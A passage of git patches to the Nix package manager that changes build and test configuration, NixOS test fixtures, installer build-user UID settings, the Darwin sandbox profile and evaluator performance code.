`ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. +- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. -- `doc_generate=yes` to enable building the documentation (manual, man pages, etc.). The docs can take a while to build, so you may want to disable this for local development. diff --git a/doc/manual/src/installation/prerequisites-source.md b/doc/manual/src/installation/prerequisites-source.md index d4babf1ea..807e82517 100644 --- a/doc/manual/src/installation/prerequisites-source.md +++ b/doc/manual/src/installation/prerequisites-source.md @@ -72,7 +72,7 @@ This is an optional dependency and can be disabled by providing a `--disable-cpuid` to the `configure` script. - - Unless `./configure --disable-tests` is specified, GoogleTest (GTest) and + - Unless `./configure --disable-unit-tests` is specified, GoogleTest (GTest) and RapidCheck are required, which are available at and respectively. diff --git a/mk/disable-tests.mk b/mk/disable-tests.mk deleted file mode 100644 index f72f84412..000000000 --- a/mk/disable-tests.mk +++ /dev/null @@ -1,12 +0,0 @@ -# This file is only active for `./configure --disable-tests`. -# Running `make check` or `make installcheck` would indicate a mistake in the -# caller. - -installcheck: - @echo "Tests are disabled. Configure without '--disable-tests', or avoid calling 'make installcheck'." - @exit 1 - -# This currently has little effect. -check: - @echo "Tests are disabled. Configure without '--disable-tests', or avoid calling 'make check'." - @exit 1 diff --git a/package.nix b/package.nix index 24395b484..370820c40 100644 --- a/package.nix +++ b/package.nix @@ -104,30 +104,6 @@ let inherit doBuild doCheck doInstallCheck; }; - filesets = { - baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; - - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. - ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; - }; - mkDerivation = if withCoverageChecks then @@ -151,32 +127,44 @@ mkDerivation (finalAttrs: let # to be run later, requiresthe unit tests to be built. buildUnitTests = doCheck || installUnitTests; - anySortOfTesting = buildUnitTests || doInstallCheck; - in { inherit pname version; src = let - + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; in fileset.toSource { root = ./.; - fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ - filesets.configureFiles - filesets.topLevelBuildFiles - ./doc/internal-api + fileset = fileset.intersect baseFiles (fileset.unions ([ + # For configure + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. + ./README.md + # For make, regardless of what we are building + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc ./precompiled-headers.h ./src - ./tests/unit ./COPYING ./scripts/local.mk - ] ++ lib.optionals anySortOfTesting [ - filesets.functionalTestFiles + ] ++ lib.optionals buildUnitTests [ + ./doc/manual + ] ++ lib.optionals enableInternalAPIDocs [ + ./doc/internal-api + ] ++ lib.optionals buildUnitTests [ + ./tests/unit + ] ++ lib.optionals doInstallCheck [ + ./tests/functional ])); }; @@ -277,7 +265,8 @@ in { configureFlags = [ "--sysconfdir=/etc" (lib.enableFeature doBuild "build") - (lib.enableFeature anySortOfTesting "tests") + (lib.enableFeature buildUnitTests "unit-tests") + (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") @@ -310,10 +299,7 @@ in { ''; postInstall = lib.optionalString doBuild ( - '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - '' + lib.optionalString stdenv.hostPlatform.isStatic '' + lib.optionalString stdenv.hostPlatform.isStatic '' mkdir -p $out/nix-support echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products '' + lib.optionalString stdenv.isDarwin '' @@ -322,7 +308,10 @@ in { $out/lib/libboost_context.dylib \ $out/lib/libnixutil.dylib '' - ) + lib.optionalString enableInternalAPIDocs '' + ) + lib.optionalString enableManual '' + mkdir -p ''${!outputDoc}/nix-support + echo "doc manual ''${!outputDoc}/share/doc/nix/manual" >> ''${!outputDoc}/nix-support/hydra-build-products + '' + lib.optionalString enableInternalAPIDocs '' mkdir -p ''${!outputDoc}/nix-support echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> ''${!outputDoc}/nix-support/hydra-build-products ''; From 123ef6a9967d5ca8ed4052d84128ff0e98950532 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 10:19:25 -0800 Subject: [PATCH 139/654] Fix warnings when running checks `nix flake check` had these warnings: trace: warning: Module argument `nodes.client.config` is deprecated. Use `nodes.client` instead. trace: warning: Module argument `nodes.client.config` is deprecated. Use `nodes.client` instead. trace: warning: The option `services.openssh.permitRootLogin' defined in `/nix/store/3m3hfpmbjdf4w39qfjami7ljhvhczay1-source/tests/nixos/nix-copy.nix' has been renamed to `services.openssh.settings.PermitRootLogin'. trace: warning: Module argument `nodes.http_dns.config` is deprecated. Use `nodes.http_dns` instead. trace: warning: Module argument `nodes.github.config` is deprecated. Use `nodes.github` instead. trace: warning: Module argument `nodes.sourcehut.config` is deprecated. Use `nodes.sourcehut` instead. --- tests/nixos/github-flakes.nix | 2 +- tests/nixos/nix-copy.nix | 2 +- tests/nixos/nss-preload.nix | 4 ++-- tests/nixos/remote-builds-ssh-ng.nix | 2 +- tests/nixos/remote-builds.nix | 8 ++++---- tests/nixos/sourcehut-flakes.nix | 2 +- 6 files changed, 10 insertions(+), 10 deletions(-) diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix index 62ae8871b..a51689445 100644 --- a/tests/nixos/github-flakes.nix +++ b/tests/nixos/github-flakes.nix @@ -144,7 +144,7 @@ in virtualisation.memorySize = 4096; nix.settings.substituters = lib.mkForce [ ]; nix.extraOptions = "experimental-features = nix-command flakes"; - networking.hosts.${(builtins.head nodes.github.config.networking.interfaces.eth1.ipv4.addresses).address} = + networking.hosts.${(builtins.head nodes.github.networking.interfaces.eth1.ipv4.addresses).address} = [ "channels.nixos.org" "api.github.com" "github.com" ]; security.pki.certificateFiles = [ "${cert}/ca.crt" ]; }; diff --git a/tests/nixos/nix-copy.nix b/tests/nixos/nix-copy.nix index 2981cc2b8..7db5197aa 100644 --- a/tests/nixos/nix-copy.nix +++ b/tests/nixos/nix-copy.nix @@ -36,7 +36,7 @@ in { server = { config, pkgs, ... }: { services.openssh.enable = true; - services.openssh.permitRootLogin = "yes"; + services.openssh.settings.PermitRootLogin = "yes"; users.users.root.password = "foobar"; virtualisation.writableStore = true; virtualisation.additionalPaths = [ pkgB pkgC ]; diff --git a/tests/nixos/nss-preload.nix b/tests/nixos/nss-preload.nix index cef62e95b..00505d114 100644 --- a/tests/nixos/nss-preload.nix +++ b/tests/nixos/nss-preload.nix @@ -84,8 +84,8 @@ in client = { lib, nodes, pkgs, ... }: { networking.useDHCP = false; networking.nameservers = [ - (lib.head nodes.http_dns.config.networking.interfaces.eth1.ipv6.addresses).address - (lib.head nodes.http_dns.config.networking.interfaces.eth1.ipv4.addresses).address + (lib.head nodes.http_dns.networking.interfaces.eth1.ipv6.addresses).address + (lib.head nodes.http_dns.networking.interfaces.eth1.ipv4.addresses).address ]; networking.interfaces.eth1.ipv6.addresses = [ { address = "fd21::10"; prefixLength = 64; } diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index b59dde9bf..20a43803d 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -81,7 +81,7 @@ in client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") # Perform a build - out = client.succeed("nix-build ${expr nodes.client.config 1} 2> build-output") + out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") # Verify that the build was done on the builder builder.succeed(f"test -e {out.strip()}") diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 1c96cc787..ad7f509db 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -90,22 +90,22 @@ in # Perform a build and check that it was performed on the builder. out = client.succeed( - "nix-build ${expr nodes.client.config 1} 2> build-output", + "nix-build ${expr nodes.client 1} 2> build-output", "grep -q Hello build-output" ) builder1.succeed(f"test -e {out}") # And a parallel build. - paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client.config 2})\!out $(nix-instantiate ${expr nodes.client.config 3})\!out') + paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') out1, out2 = paths.split() builder1.succeed(f"test -e {out1} -o -e {out2}") builder2.succeed(f"test -e {out1} -o -e {out2}") # And a failing build. - client.fail("nix-build ${expr nodes.client.config 5}") + client.fail("nix-build ${expr nodes.client 5}") # Test whether the build hook automatically skips unavailable builders. builder1.block() - client.succeed("nix-build ${expr nodes.client.config 4}") + client.succeed("nix-build ${expr nodes.client 4}") ''; } diff --git a/tests/nixos/sourcehut-flakes.nix b/tests/nixos/sourcehut-flakes.nix index 6e8d884a0..04f3590e1 100644 --- a/tests/nixos/sourcehut-flakes.nix +++ b/tests/nixos/sourcehut-flakes.nix @@ -108,7 +108,7 @@ in flake-registry = https://git.sr.ht/~NixOS/flake-registry/blob/master/flake-registry.json ''; environment.systemPackages = [ pkgs.jq ]; - networking.hosts.${(builtins.head nodes.sourcehut.config.networking.interfaces.eth1.ipv4.addresses).address} = + networking.hosts.${(builtins.head nodes.sourcehut.networking.interfaces.eth1.ipv4.addresses).address} = [ "git.sr.ht" ]; security.pki.certificateFiles = [ "${cert}/ca.crt" ]; }; From 1f7b62f123fde15b89746b6b1f73c40a8e927499 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 10:36:18 -0800 Subject: [PATCH 140/654] Use `nix daemon` in the test suite As part of the CLI stabilization effort, the last remaining checkbox (at the moment) for `nix daemon` is that it "needs testing". This implements the proposal of using `nix daemon` in place of `nix-daemon` in the test suite. --- tests/functional/build-remote-trustless-should-pass-1.sh | 2 +- tests/functional/common/vars-and-functions.sh.in | 4 ++-- tests/functional/nix-daemon-untrusting.sh | 2 +- tests/functional/store-info.sh | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/tests/functional/build-remote-trustless-should-pass-1.sh b/tests/functional/build-remote-trustless-should-pass-1.sh index 516bdf092..736e280e4 100644 --- a/tests/functional/build-remote-trustless-should-pass-1.sh +++ b/tests/functional/build-remote-trustless-should-pass-1.sh @@ -2,7 +2,7 @@ source common.sh # Remote trusts us file=build-hook.nix -prog=nix-daemon +prog='nix%20daemon' proto=ssh-ng source build-remote-trustless.sh diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in index 848988af9..c25366481 100644 --- a/tests/functional/common/vars-and-functions.sh.in +++ b/tests/functional/common/vars-and-functions.sh.in @@ -95,7 +95,7 @@ startDaemon() { fi # Start the daemon, wait for the socket to appear. rm -f $NIX_DAEMON_SOCKET_PATH - PATH=$DAEMON_PATH nix-daemon & + PATH=$DAEMON_PATH nix --extra-experimental-features 'nix-command' daemon & _NIX_TEST_DAEMON_PID=$! export _NIX_TEST_DAEMON_PID for ((i = 0; i < 300; i++)); do @@ -148,7 +148,7 @@ fi isDaemonNewer () { [[ -n "${NIX_DAEMON_PACKAGE:-}" ]] || return 0 local requiredVersion="$1" - local daemonVersion=$($NIX_DAEMON_PACKAGE/bin/nix-daemon --version | cut -d' ' -f3) + local daemonVersion=$($NIX_DAEMON_PACKAGE/bin/nix daemon --version | cut -d' ' -f3) [[ $(nix eval --expr "builtins.compareVersions ''$daemonVersion'' ''$requiredVersion''") -ge 0 ]] } diff --git a/tests/functional/nix-daemon-untrusting.sh b/tests/functional/nix-daemon-untrusting.sh index bcdb70989..c339b5833 100755 --- a/tests/functional/nix-daemon-untrusting.sh +++ b/tests/functional/nix-daemon-untrusting.sh @@ -1,3 +1,3 @@ #!/bin/sh -exec nix-daemon --force-untrusted "$@" +exec nix daemon --force-untrusted "$@" diff --git a/tests/functional/store-info.sh b/tests/functional/store-info.sh index c002e50be..18a8131a9 100644 --- a/tests/functional/store-info.sh +++ b/tests/functional/store-info.sh @@ -6,7 +6,7 @@ STORE_INFO_JSON=$(nix store info --json) echo "$STORE_INFO" | grep "Store URL: ${NIX_REMOTE}" if [[ -v NIX_DAEMON_PACKAGE ]] && isDaemonNewer "2.7.0pre20220126"; then - DAEMON_VERSION=$($NIX_DAEMON_PACKAGE/bin/nix-daemon --version | cut -d' ' -f3) + DAEMON_VERSION=$($NIX_DAEMON_PACKAGE/bin/nix daemon --version | cut -d' ' -f3) echo "$STORE_INFO" | grep "Version: $DAEMON_VERSION" [[ "$(echo "$STORE_INFO_JSON" | jq -r ".version")" == "$DAEMON_VERSION" ]] fi From ba0087316acc2aba999cabe5e1a159da636b2569 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Mon, 18 Dec 2023 12:59:58 -0800 Subject: [PATCH 141/654] package: don't set sysconfdir in devShells --- flake.nix | 2 +- package.nix | 6 +++++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index 8c4436729..a8fc105e8 100644 --- a/flake.nix +++ b/flake.nix @@ -395,7 +395,7 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (attrs: { + makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; forDevShell = true; }).overrideAttrs (attrs: { installFlags = "sysconfdir=$(out)/etc"; shellHook = '' PATH=$prefix/bin:$PATH diff --git a/package.nix b/package.nix index 370820c40..b5ff45083 100644 --- a/package.nix +++ b/package.nix @@ -87,6 +87,9 @@ , test-daemon ? null , test-client ? null +# Avoid setting things that would interfere with a functioning devShell +, forDevShell ? false + # Not a real argument, just the only way to approximate let-binding some # stuff for argument defaults. , __forDefaults ? { @@ -263,13 +266,14 @@ in { ); configureFlags = [ - "--sysconfdir=/etc" (lib.enableFeature doBuild "build") (lib.enableFeature buildUnitTests "unit-tests") (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") + ] ++ lib.optionals (!forDevShell) [ + "--sysconfdir=/etc" ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" From 6f4930382bb61f0a9b2a9e5b0080977a4dd03866 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:34:08 -0800 Subject: [PATCH 142/654] Document more `Makefile` variables --- doc/manual/src/contributing/hacking.md | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9478c424d..dce0422dc 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -66,13 +66,24 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run +`make install`. + +You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment +variables to override `Makefile` variables. + - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. - `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. - `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. - - The docs can take a while to build, so you may want to disable this for local development. +- `libraries=libutil programs=` to only build a specific library (this will + fail in the linking phase if you don't have the other libraries built, but is + useful for checking types). +- `libraries= programs=nix` to only build a specific program (this will not, in + general, work, because the programs need the libraries). ## Building Nix From 0cee56db1ace13a1f4b856c800950b2fb04df993 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 14:04:25 -0800 Subject: [PATCH 143/654] Fix `logging.sh` test on macOS MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit On macOS in the `nix develop` shell, `make tests/functional/logging.sh.test` errors: ++(logging.sh:18) mktemp +(logging.sh:18) builder=/var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.StuabKUhMh +(logging.sh:19) echo -e '#!/bin/sh\nmkdir $out' +++(logging.sh:22) mktemp -d ++(logging.sh:22) nix-build -E 'with import ./config.nix; mkDerivation { name = "fnord"; builder = /var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.StuabKUhMh; }' --out-link /var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.oaKcy0NXqC/result error: … while calling the 'derivationStrict' builtin at :9:12: 8| 9| strict = derivationStrict drvAttrs; | ^ 10| … while evaluating derivation 'fnord' whose name attribute is located at «string»:1:42 … while evaluating attribute 'args' of derivation 'fnord' at /Users/wiggles/nix/tests/functional/config.nix:23:7: 22| builder = shell; 23| args = ["-e" args.builder or (builtins.toFile "builder-${args.name}.sh" '' | ^ 24| if [ -e "$NIX_ATTRS_SH_FILE" ]; then source $NIX_ATTRS_SH_FILE; fi; error: path '/var' is a symlink +(logging.sh:22) outp= ++(logging.sh:22) onError ++(/Users/wiggles/nix/tests/functional/common/vars-and-functions.sh:237) set +x logging.sh: test failed at: main in logging.sh:22 This is because `mktemp` returns a path like `/var/folders/z5/fclwwdms3r1gq4k4p3pkvvc00000gn/T/tmp.qDY24l6bIM`, where `/var` is a symlink to `/private/var`. Then, we attempt to use that path as a `builder`, which errors because symlinks are impure or whatever. Anyways, we can fix this by using `realpath "$(mktemp)"` instead of `mktemp` directly. NB: This error doesn't seem to happen when I run the tests through `nix flake check`. I'm not sure if Nix does something to `TMP` in that case. --- tests/functional/logging.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/logging.sh b/tests/functional/logging.sh index 1481b9b36..1ccc21d0b 100644 --- a/tests/functional/logging.sh +++ b/tests/functional/logging.sh @@ -15,7 +15,7 @@ nix-build dependencies.nix --no-out-link --compress-build-log [ "$(nix-store -l $path)" = FOO ] # test whether empty logs work fine with `nix log`. -builder="$(mktemp)" +builder="$(realpath "$(mktemp)")" echo -e "#!/bin/sh\nmkdir \$out" > "$builder" outp="$(nix-build -E \ 'with import ./config.nix; mkDerivation { name = "fnord"; builder = '"$builder"'; }' \ From 23fb19cb18709ed097274d427a1024ae08789ed3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 18 Dec 2023 22:36:31 +0000 Subject: [PATCH 144/654] build(deps): bump zeebe-io/backport-action from 2.2.0 to 2.3.0 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.2.0 to 2.3.0. - [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.2.0...v2.3.0) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index 85ddcfad3..f003114ba 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.2.0 + uses: zeebe-io/backport-action@v2.3.0 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From fa4bbe53e837a138c382468601cd769736f7d1dc Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Mon, 18 Dec 2023 15:02:26 -0800 Subject: [PATCH 145/654] installer: allow overriding of NIX_FIRST_BUILD_ID on darwin because there are often already users in the 300 range and it's painful to work around. revives #6466 --- scripts/install-darwin-multi-user.sh | 6 ++++-- scripts/install-multi-user.sh | 19 +++++++++++++++---- scripts/install-systemd-multi-user.sh | 4 ++++ 3 files changed, 23 insertions(+), 6 deletions(-) diff --git a/scripts/install-darwin-multi-user.sh b/scripts/install-darwin-multi-user.sh index 0326d3415..766f81bde 100644 --- a/scripts/install-darwin-multi-user.sh +++ b/scripts/install-darwin-multi-user.sh @@ -3,11 +3,13 @@ set -eu set -o pipefail +# System specific settings +export NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-301}" +export NIX_BUILD_USER_NAME_TEMPLATE="_nixbld%d" + readonly NIX_DAEMON_DEST=/Library/LaunchDaemons/org.nixos.nix-daemon.plist # create by default; set 0 to DIY, use a symlink, etc. readonly NIX_VOLUME_CREATE=${NIX_VOLUME_CREATE:-1} # now default -NIX_FIRST_BUILD_UID="301" -NIX_BUILD_USER_NAME_TEMPLATE="_nixbld%d" # caution: may update times on / if not run as normal non-root user read_only_root() { diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh index a08f62333..ad3ee8881 100644 --- a/scripts/install-multi-user.sh +++ b/scripts/install-multi-user.sh @@ -25,9 +25,9 @@ readonly RED='\033[31m' readonly NIX_USER_COUNT=${NIX_USER_COUNT:-32} readonly NIX_BUILD_GROUP_ID="${NIX_BUILD_GROUP_ID:-30000}" readonly NIX_BUILD_GROUP_NAME="nixbld" -# darwin installer needs to override these -NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-30001}" -NIX_BUILD_USER_NAME_TEMPLATE="nixbld%d" +# each system specific installer must set these: +# NIX_FIRST_BUILD_UID +# NIX_BUILD_USER_NAME_TEMPLATE # Please don't change this. We don't support it, because the # default shell profile that comes with Nix doesn't support it. readonly NIX_ROOT="/nix" @@ -707,6 +707,12 @@ EOF fi } +check_required_system_specific_settings() { + if [ -z "${NIX_FIRST_BUILD_UID+x}" ] || [ -z "${NIX_BUILD_USER_NAME_TEMPLATE+x}" ]; then + failure "Internal error: System specific installer for $(uname) ($1) does not export required settings." + fi +} + welcome_to_nix() { local -r NIX_UID_RANGES="${NIX_FIRST_BUILD_UID}..$((NIX_FIRST_BUILD_UID + NIX_USER_COUNT - 1))" local -r RANGE_TEXT=$(echo -ne "${BLUE}(uids [${NIX_UID_RANGES}])${ESC}") @@ -726,7 +732,9 @@ manager. This will happen in a few stages: if you are ready to continue. 3. Create the system users ${RANGE_TEXT} and groups ${GROUP_TEXT} - that the Nix daemon uses to run builds. + that the Nix daemon uses to run builds. To create system users + in a different range, exit and run this tool again with + NIX_FIRST_BUILD_UID set. 4. Perform the basic installation of the Nix files daemon. @@ -968,13 +976,16 @@ main() { if is_os_darwin; then # shellcheck source=./install-darwin-multi-user.sh . "$EXTRACTED_NIX_PATH/install-darwin-multi-user.sh" + check_required_system_specific_settings "install-darwin-multi-user.sh" elif is_os_linux; then # shellcheck source=./install-systemd-multi-user.sh . "$EXTRACTED_NIX_PATH/install-systemd-multi-user.sh" # most of this works on non-systemd distros also + check_required_system_specific_settings "install-systemd-multi-user.sh" else failure "Sorry, I don't know what to do on $(uname)" fi + welcome_to_nix if ! is_root; then diff --git a/scripts/install-systemd-multi-user.sh b/scripts/install-systemd-multi-user.sh index 07b34033a..202a9bb54 100755 --- a/scripts/install-systemd-multi-user.sh +++ b/scripts/install-systemd-multi-user.sh @@ -3,6 +3,10 @@ set -eu set -o pipefail +# System specific settings +export NIX_FIRST_BUILD_UID="${NIX_FIRST_BUILD_UID:-30001}" +export NIX_BUILD_USER_NAME_TEMPLATE="nixbld%d" + readonly SERVICE_SRC=/lib/systemd/system/nix-daemon.service readonly SERVICE_DEST=/etc/systemd/system/nix-daemon.service From 7526b7ded6d5884cefcd4c71e0a33962d883ae78 Mon Sep 17 00:00:00 2001 From: Andrew Marshall Date: Mon, 18 Dec 2023 19:33:20 -0500 Subject: [PATCH 146/654] Allow access to /dev/stderr in Darwin sandbox We allow /dev/stdout, so why not this? Since it is process-local, anyway, should not be possible to escape sandbox using it. --- src/libstore/build/sandbox-defaults.sb | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb index 77f013aea..25ec11285 100644 --- a/src/libstore/build/sandbox-defaults.sb +++ b/src/libstore/build/sandbox-defaults.sb @@ -68,6 +68,7 @@ R""( (allow file* (literal "/dev/null") (literal "/dev/random") + (literal "/dev/stderr") (literal "/dev/stdin") (literal "/dev/stdout") (literal "/dev/tty") From 0218e4e6c386e4c432520506568420c3cc384e47 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 04:15:51 +0100 Subject: [PATCH 147/654] memset less in addToStoreFromDump MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit resizing a std::string clears the newly added bytes, which is not necessary here and comes with a ~1.4% slowdown on our test nixos config. 〉 nix eval --raw --impure --expr 'with import {}; system' before: Time (mean ± σ): 4.486 s ± 0.003 s [User: 3.978 s, System: 0.507 s] Range (min … max): 4.482 s … 4.492 s 10 runs after: Time (mean ± σ): 4.429 s ± 0.002 s [User: 3.929 s, System: 0.500 s] Range (min … max): 4.427 s … 4.433 s 10 runs --- src/libstore/local-store.cc | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 7e82bae28..d903bb061 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -18,6 +18,8 @@ #include #include +#include +#include #include #include #include @@ -1130,7 +1132,11 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name path. */ bool inMemory = false; - std::string dump; + struct Free { + void operator()(void* v) { free(v); } + }; + std::unique_ptr dumpBuffer(nullptr); + std::string_view dump; /* Fill out buffer, and decide whether we are working strictly in memory based on whether we break out because the buffer is full @@ -1139,13 +1145,18 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name auto oldSize = dump.size(); constexpr size_t chunkSize = 65536; auto want = std::min(chunkSize, settings.narBufferSize - oldSize); - dump.resize(oldSize + want); + if (auto tmp = realloc(dumpBuffer.get(), oldSize + want)) { + dumpBuffer.release(); + dumpBuffer.reset((char*) tmp); + } else { + throw std::bad_alloc(); + } auto got = 0; Finally cleanup([&]() { - dump.resize(oldSize + got); + dump = {dumpBuffer.get(), dump.size() + got}; }); try { - got = source.read(dump.data() + oldSize, want); + got = source.read(dumpBuffer.get() + oldSize, want); } catch (EndOfFile &) { inMemory = true; break; @@ -1171,7 +1182,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name else writeFile(tempPath, bothSource); - dump.clear(); + dumpBuffer.reset(); + dump = {}; } auto [hash, size] = hashSink->finish(); From 78353deb028fcc700776db9d92dcae45d68fb85f Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 08:24:45 +0100 Subject: [PATCH 148/654] encode black holes as tApp values MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit checking for isBlackhole in the forceValue hot path is rather more expensive than necessary, and with a little bit of trickery we can move such handling into the isApp case. small performance benefit, but under some circumstances we've seen 2% improvement as well. 〉 nix eval --raw --impure --expr 'with import {}; system' before: Time (mean ± σ): 4.429 s ± 0.002 s [User: 3.929 s, System: 0.500 s] Range (min … max): 4.427 s … 4.433 s 10 runs after: Time (mean ± σ): 4.396 s ± 0.002 s [User: 3.894 s, System: 0.501 s] Range (min … max): 4.393 s … 4.399 s 10 runs --- src/libexpr/eval-inline.hh | 13 +++++++---- src/libexpr/eval.cc | 44 +++++++++++++++++++++----------------- src/libexpr/eval.hh | 8 +++++++ src/libexpr/nixexpr.hh | 7 ++++++ src/libexpr/primops.cc | 23 ++++++++++++++++++++ src/libexpr/primops.hh | 6 ++++++ src/libexpr/value.hh | 24 ++++++++++++++------- 7 files changed, 93 insertions(+), 32 deletions(-) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index c37b1d62b..9d08f1938 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -104,11 +104,16 @@ void EvalState::forceValue(Value & v, Callable getPos) } } else if (v.isApp()) { - PosIdx pos = getPos(); - callFunction(*v.app.left, *v.app.right, v, pos); + try { + callFunction(*v.app.left, *v.app.right, v, noPos); + } catch (InfiniteRecursionError & e) { + // only one black hole can *throw* in any given eval stack so we need not + // check whether the position is set already. + if (v.isBlackhole()) + e.err.errPos = positions[getPos()]; + throw; + } } - else if (v.isBlackhole()) - error("infinite recursion encountered").atPos(getPos()).template debugThrow(); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e494148e..71c151f96 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -162,7 +162,17 @@ void Value::print(const SymbolTable &symbols, std::ostream &str, break; case tThunk: case tApp: - str << ""; + if (!isBlackhole()) { + str << ""; + } else { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. + str << 